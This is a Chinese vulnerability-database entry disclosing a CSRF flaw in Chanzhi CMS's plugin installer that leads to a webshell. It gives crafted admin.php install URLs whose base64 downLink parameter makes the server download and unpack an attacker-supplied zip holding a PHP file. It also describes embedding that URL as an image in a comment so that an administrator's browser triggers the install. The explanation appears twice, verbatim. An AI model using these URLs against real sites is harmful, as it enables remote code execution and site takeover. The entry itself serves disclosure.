|蝉知Cms Csrf Getshell - VULHUB开源网络安全威胁库

蝉知Cms Csrf Getshell

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： get提交某个url即可getshell ### 详细说明： http://localhost/www/admin.php?m=package&f=obtain 在安装插件的地方我们随便找个插件安装先点击“自动安装” 会出来个提示框有个“我同意授权”的按钮对着按钮右键复制他提交的URL ``` http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no ``` 通过这个URL get提交即可安装该插件看看downLink参数的值 ``` aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA== ``` 明显的是base64 给他解密一下 http://www.chanzhi.org/extension-buyExt-1-download.html 打开这个URL就会弹出下载。于是我下载下来看了看结构然后删减删减首先先新建一个名为"isTop"（随意）的文件夹在里面再建个名为"www"的文件夹接着再www文件夹下建立个template文件夹 template文件夹里建立一个index.php 最后对isTop压缩放到某个网站里于是我构造出了如下URL ``` http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no ``` 不需要对参数md5赋值我的下载链接解密后是 http://localhost/sb.zip 然后开始GET提交这个URL [<img src="https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png" alt="搜狗截图15年02月22日1558_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png) 提交后会先给他下载到\system\tmp\package\ 目录然后再进行解压接着我们根据压缩出来的路径访问index.php文件 [<img src="https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png" alt="搜狗截图15年02月22日1603_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png) 找个可以和管理员互交的地方比如留言评论等地方插入一个图片 URL为刚才的payload ### 漏洞证明： http://localhost/www/admin.php?m=package&f=obtain 在安装插件的地方我们随便找个插件安装先点击“自动安装” 会出来个提示框有个“我同意授权”的按钮对着按钮右键复制他提交的URL ``` http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no ``` 通过这个URL get提交即可安装该插件看看downLink参数的值 ``` aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA== ``` 明显的是base64 给他解密一下 http://www.chanzhi.org/extension-buyExt-1-download.html 打开这个URL就会弹出下载。于是我下载下来看了看结构然后删减删减首先先新建一个名为"isTop"（随意）的文件夹在里面再建个名为"www"的文件夹接着再www文件夹下建立个template文件夹 template文件夹里建立一个index.php 最后对isTop压缩放到某个网站里于是我构造出了如下URL ``` http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no ``` 不需要对参数md5赋值我的下载链接解密后是 http://localhost/sb.zip 然后开始GET提交这个URL [<img src="https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png" alt="搜狗截图15年02月22日1558_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/221615069d9d6dd65d61e1808d74b1b1b0375f86.png) 提交后会先给他下载到\system\tmp\package\ 目录然后再进行解压接着我们根据压缩出来的路径访问index.php文件 [<img src="https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png" alt="搜狗截图15年02月22日1603_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/2216162751407a2e01e491d756509187c73712f7.png) 找个可以和管理员互交的地方比如留言评论等地方插入一个图片 URL为刚才的payload

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™